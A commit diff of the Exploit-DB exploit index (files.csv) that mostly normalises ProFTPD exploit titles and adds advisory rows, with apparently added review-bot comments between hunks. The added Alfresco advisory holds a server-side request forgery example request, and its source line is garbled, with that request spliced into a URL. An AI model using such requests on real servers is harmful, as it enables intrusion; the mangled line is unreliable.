DB: 2016-01-19
10 new exploits
This commit is contained in:
parent
7f341adc84
commit
93d901f3b2
14 changed files with 709 additions and 43 deletions
46
files.csv
|
@ -41,7 +41,7 @@ id,file,description,date,author,platform,type,port
|
|||
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,N/A,linux,local,0
|
||||
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
|
||||
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
|
||||
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
|
||||
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0
|
||||
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80
|
||||
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25
|
||||
|
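Review bot: the commit message reads "10 new exploits", but this hunk only re-titles an existing row (43 changes from `ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit` to `ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit`), and the next seventeen files.csv hunks do the same ` - ` separator normalisation on other ProFTPD rows; say so in the commit message so the title clean-up is discoverable in history. The rendered view has also lost the `+`/`-` markers, so each edit shows up as a repeated row where the second copy is the new text.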
@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
|
|||
104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0
|
||||
105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308
|
||||
106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0
|
||||
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
|
||||
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
|
||||
109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135
|
||||
110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
|
||||
111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
|
||||
|
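Review bot: while row 107 is being normalised here, the unchanged context row 105 two lines above it reads `GNU Cfengine 2.-2.0.3`, which looks like a mangled version range and would fit in the same title pass; row 110 (`ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root`) also uses ` - ` both as a version range and as the title separator, which the normalisation elsewhere in this commit does not disambiguate.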
@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port
|
|||
391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548
|
||||
392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401
|
||||
393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - Local pr_ctrls_connect Vulnerability (ftpdctl)",2004-08-13,pi3,linux,local,0
|
||||
395,platforms/windows/local/395.c,"AOL Instant Messenger AIM _Away_ Message Local Exploit",2004-08-14,mandragore,windows,local,0
|
||||
396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0
|
||||
397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143
|
||||
|
@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port
|
|||
2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0
|
||||
2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
|
||||
2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0
|
||||
2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0
|
||||
2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0
|
||||
|
@ -2602,7 +2602,7 @@ id,file,description,date,author,platform,type,port
|
|||
2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0
|
||||
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0
|
||||
2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
|
||||
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0
|
||||
2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0
|
||||
2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include Vulnerability",2006-12-14,ex0,php,webapps,0
|
||||
|
@ -2997,7 +2997,7 @@ id,file,description,date,author,platform,type,port
|
|||
3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 (album) Remote SQL Injection Vulnerability",2007-02-17,Bl0od3r,php,webapps,0
|
||||
3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0
|
||||
3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit",2007-02-18,Revenge,linux,local,0
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0
|
||||
3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0
|
||||
3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0
|
||||
3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0
|
||||
|
@ -3957,7 +3957,7 @@ id,file,description,date,author,platform,type,port
|
|||
4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0
|
||||
4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0
|
||||
4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
|
||||
4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0
|
||||
4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
|
||||
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389
|
||||
|
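Review bot: the separator in row 4312 lands after the parenthetical (`ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit`), whereas the other rows touched by this commit put it before one (row 43: `ProFTPD 1.2.9RC1 - (mod_sql) ...`, row 2856: `ProFTPD 1.3.0 - (sreplace) ...`); pick one placement so the titles sort and grep consistently.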
@ -7565,7 +7565,7 @@ id,file,description,date,author,platform,type,port
|
|||
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
|
||||
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
|
||||
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0
|
||||
8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
|
||||
8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
|
||||
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0
|
||||
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0
|
||||
8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0
|
||||
|
@ -9414,7 +9414,7 @@ id,file,description,date,author,platform,type,port
|
|||
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
|
||||
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
|
||||
10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion Vulnerability",2009-10-12,NoGe,php,webapps,0
|
||||
10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0
|
||||
10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80
|
||||
|
@ -13439,7 +13439,7 @@ id,file,description,date,author,platform,type,port
|
|||
15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0
|
||||
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
|
||||
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
|
||||
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
|
||||
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
|
||||
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
|
||||
|
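Review bot: row 15449 gains a version (`ProFTPD IAC 1.3.x - Remote Root Exploit`) that the old title did not carry, so this is a content change rather than a separator fix and should be checked against the exploit file itself. The port column also stays `0` here while the other ProFTPD remote rows in this commit use `21` (rows 43, 107, 110, 2856, 4312).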
@ -13960,7 +13960,7 @@ id,file,description,date,author,platform,type,port
|
|||
16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0
|
||||
16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0
|
||||
16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
|
||||
16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0
|
||||
16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0
|
||||
16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
|
||||
|
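Review bot: the context lines show row 16221 sitting before rows 16127 to 16132, so the file is out of ID order around this hunk; worth a follow-up move so that tooling that assumes ascending IDs does not mis-detect the last ID.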
@ -14653,7 +14653,7 @@ id,file,description,date,author,platform,type,port
|
|||
16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - _secure_ Overflow (Linux)",2010-09-20,metasploit,linux,remote,0
|
||||
16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0
|
||||
16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
|
||||
16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
|
||||
16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String Vulnerability",2010-04-30,metasploit,linux,remote,0
|
||||
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,metasploit,hardware,remote,0
|
||||
|
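Review bot: after this change row 16851 reads `ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)`, where the first ` - ` is a version range and the second the title separator; the unchanged neighbour row 16852 (`ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)`) keeps the old form, so the two adjacent Metasploit rows now follow different conventions.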
@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port
|
|||
16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0
|
||||
16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0
|
||||
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0
|
||||
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
|
||||
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
|
||||
16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
|
||||
16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0
|
||||
16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0
|
||||
|
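Review bot: row 16921 keeps the hyphen between product and version (`ProFTPD-1.3.3c - Backdoor Command Execution`) even though every other ProFTPD row in this commit is written `ProFTPD 1.3...`; the unchanged context row 16922 (`UnrealIRCD 3.2.8.1 - Backdoor Command Execution`) shows the form the new title should match.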
@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port
|
|||
17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0
|
||||
17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
|
||||
17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0
|
||||
17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
|
||||
17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
|
||||
17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0
|
||||
17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
|
||||
17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0
|
||||
|
@ -16869,7 +16869,7 @@ id,file,description,date,author,platform,type,port
|
|||
19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0
|
||||
19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0
|
||||
19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto RodrÃguez Aragonés",windows,local,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0
|
||||
19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0
|
||||
19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0
|
||||
|
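Review bot: the context row 19502 carries a mojibake author field (`Alberto RodrÃguez Aragonés`, a double-encoded UTF-8 name); since this hunk is already editing the neighbouring row 19503, the encoding repair could go in the same clean-up.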
@ -17858,7 +17858,7 @@ id,file,description,date,author,platform,type,port
|
|||
20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
|
||||
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
|
||||
20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
|
||||
20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
|
||||
20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
|
||||
20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0
|
||||
|
@ -19339,7 +19339,7 @@ id,file,description,date,author,platform,type,port
|
|||
22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0
|
||||
22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0
|
||||
22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0
|
||||
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
|
||||
22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow Vulnerability",2002-12-10,"Joel Soderberg",windows,remote,0
|
||||
|
@ -20397,7 +20397,7 @@ id,file,description,date,author,platform,type,port
|
|||
23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service Vulnerability",1998-12-12,marchew,irix,dos,0
|
||||
23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation Vulnerability",2003-09-22,"Sebastian Krahmer",linux,local,0
|
||||
23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 Login Remote Denial of Service Vulnerability",2003-09-23,"Moran Zavdi",windows,dos,0
|
||||
23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
|
||||
23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
|
||||
23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0
|
||||
23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 SQL-GW Connection Denial of Service Vulnerability",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0
|
||||
23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure Vulnerability",2003-09-24,"Phuong Nguyen",multiple,remote,0
|
||||
|
@ -35500,3 +35500,13 @@ id,file,description,date,author,platform,type,port
|
|||
39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
|
||||
39255,platforms/php/webapps/39255.html,"WEBMIS CMS Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
|
||||
39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39258,platforms/multiple/remote/39258.txt,"Alfresco /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39259,platforms/multiple/remote/39259.txt,"Alfresco /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
|
||||
39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443
|
||||
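Review bot: the new rows are inconsistent in exactly the field this commit is normalising elsewhere: 39252 to 39259 have no ` - ` separator in their titles while 39260 to 39266 do. The port column is also mixed (80 for the three Advanced Electron Forum rows, 443 for 39266, 0 for the Alfresco SSRF and WordPress rows). Rows 39256 and 39257 are two entries for the same plugin, author and date that differ only in the script name, and the Tera Charts titles say "Path Traversal File Disclosure" whereas the added 39256.txt and 39257.txt describe the issue as "local file-include"; align the wording between files.csv and the advisories.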
9
platforms/multiple/remote/39258.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
|
||||
|
||||
Alfresco Community Edition is prone to multiple security vulnerabilities.
|
||||
|
||||
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
|
||||
|
||||
Alfresco Community Edition 4.2.f and earlier are vulnerable.
|
||||
|
